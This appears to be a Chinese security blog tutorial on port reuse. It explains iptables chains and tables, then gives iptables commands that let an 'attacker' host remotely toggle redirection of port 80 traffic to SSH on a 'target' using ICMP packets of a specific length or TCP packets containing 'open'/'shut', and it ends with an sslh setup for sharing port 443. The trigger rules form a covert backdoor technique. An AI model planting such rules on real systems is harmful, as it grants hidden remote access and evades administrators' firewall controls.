【安全】端口复用:远程遥控iptablesSSLH工具
目录
基础知识点
链的概念
表的概念
表链关系
远程遥控iptables进行端口复用
Ⅰ、利用ICMP做遥控开关
①创建端口复用链
②创建端口复用规则,将流量转发至 22 端口
③开启开关,如果接收到一个长为 1139 的 ICMP 包,则将来源 IP 添加到自己创的列表中
④关闭开关,如果接收到一个长为 1140 的 ICMP 包,则将来源 IP 从 自己创的列表中去掉
⑤设置跳转处理与响应
⑥验证阶段
Ⅱ、利用tcp数据包中的关键字做遥控开关
①创建端口复用链
②添加端口复用规则
③开启开关,输入特定字符开启
④关闭开关,输入特定字符关闭
⑤设置跳转处理与响应
⑥开始验证
利用SSHL工具让https&ssh共享端口
①编辑nginx配置文件
②编辑sslh配置文件
③验证
基础知识点
链的概念
iptables开启后,数据报文从进入服务器到出来会经过5道关卡,分别为Prerouting(路由前)、Input(输入)、Outpu(输出)、Forward(转发)、Postrouting(路由后):
每一道关卡中有多个规则,数据报文必须按顺序一个一个匹配这些规则,这些规则串起来就像一条链,所以我们把这些关卡都叫“链”:
【一般写规则的序号都是跳着用,5‘10’15这些,因为匹配按顺序所以对规则进行了留白】
-
INPUT链:当接收到防火墙本机地址的数据包(入站)时,应用此链中的规则;
-
OUTPUT链:当防火墙本机向外发送数据包(出站)时,应用此链中的规则;
-
FORWARD链:当接收到需要通过防火墙发送给其他地址的数据包(转发)时,应用此链中的规则;
-
PREROUTING链:(互联网进入局域网)在对数据包作路由选择之前,应用此链中的规则,如DNAT;
-
POSTROUTING链:(局域网出互联网)在对数据包作路由选择之后,应用此链中的规则,如SNAT。
表的概念
虽然每一条链上有多条规则,但有些规则的作用(功能)很相似,多条具有相同功能的规则合在一起就组成了一个“表”,iptables提供了四种“表”:
– filter表:主要用于对数据包进行过滤,根据具体的规则决定是否放行该数据包(如DROP、ACCEPT、REJECT、LOG),所谓的防火墙其实基本上是指这张表上的过滤规则,对应内核模块iptables_filter;
– nat表:(network address translation),网络地址转换功能,主要用于修改数据包的IP地址、端口号等信息(网络地址转换,如SNAT、DNAT、MASQUERADE、REDIRECT)。属于一个流的包(因为包的大小限制导致数据可能会被分成多个数据包)只会经过这个表一次,余下的包不会再通过这个表。对应内核模块iptables_nat;、
– mangle表:拆解报文,做出修改,并重新封装,主要用于修改数据包的TOS(Type Of Service,服务类型)、TTL(Time To Live,生存周期)指以及为数据包设置Mark标记,以实现Qos(Quality Of Service,服务质量)调整以及策略路由等应用,由于需要相应的路由设备支持,因此应用并不广泛。对应内核模块iptables_mangle;
– raw表:是自1.2.9以后版本的iptables新增的表,主要用于决定数据包是否被状态跟踪机制处理,在匹配数据包时,raw表的规则要优先于其他表,对应内核模块iptables_raw。
【 我们最终定义的防火墙规则,都会添加到这四张表中的其中一张表中。】
表链关系
【注:上图INPUT链中间有个nat表,上上图没有,是因为nat表仅在centos7中才会出现在INPUT链里,其他一切正常】
远程遥控iptables进行端口复用
攻击端【node1】ip :192.168.174.131
目标端【manage】ip:192.168.174.128
Ⅰ、利用ICMP做遥控开关
【注:如果目标在内网的话,就无法直接ping】
①创建端口复用链
iptables -t nat -N xxx //xxx是自己取的链名
②创建端口复用规则,将流量转发至 22 端口
iptables -t nat -A xxx -p tcp -j REDIRECT --to-port 22
③开启开关,如果接收到一个长为 1139 的 ICMP 包,则将来源 IP 添加到自己创的列表中
iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1139 -m recent --set --name qiu --rsource -j ACCEPT
④关闭开关,如果接收到一个长为 1140 的 ICMP 包,则将来源 IP 从 自己创的列表中去掉
iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1140 -m recent --name qiu --remove -j ACCEPT
长度设为1139的话实际ping应该为1111,报文头部有20个字节,由于icmp是双层,他是32位所以32*2 /8 = 8 所以应该ping1139-28
⑤设置跳转处理与响应
iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name qiu --rsource -j xxx
⑥验证阶段
(能看到策略都添加上了)
【进入node1(192.168.174.131)对目标开启复用,并验证ssh对80端口能否转发成功】
【验证成功,下面是关闭复用后的情景】
Ⅱ、利用tcp数据包中的关键字做遥控开关
①创建端口复用链
iptables -t nat -N nnn
②添加端口复用规则
iptables -t nat -A nnn -p tcp -j REDIRECT --to-port 22
③开启开关,输入特定字符开启
iptables -A INPUT -p tcp -m string --string 'open' --algo bm -m recent --set --name qiuqiu --rsource -j ACCEPT
④关闭开关,输入特定字符关闭
iptables -A INPUT -p tcp -m string --string 'shut' --algo bm -m recent --name qiuqiu --remove -j ACCEPT
⑤设置跳转处理与响应
iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name qiuqiu --rsource -j nnn
⑥开始验证
利用SSHL工具让https&ssh共享端口
准备工作:安装SSLH 与 配置nginx或apache服务器
①编辑nginx配置文件
②编辑sslh配置文件
(host那个地方改成0.0.0.0以允许 SSLH 在所有可用接口上侦听端口 443)
(之后启动sslh服务)
③验证
【通过443端口ssh连接成功】
下一篇:Jenkins集群配置/并发构建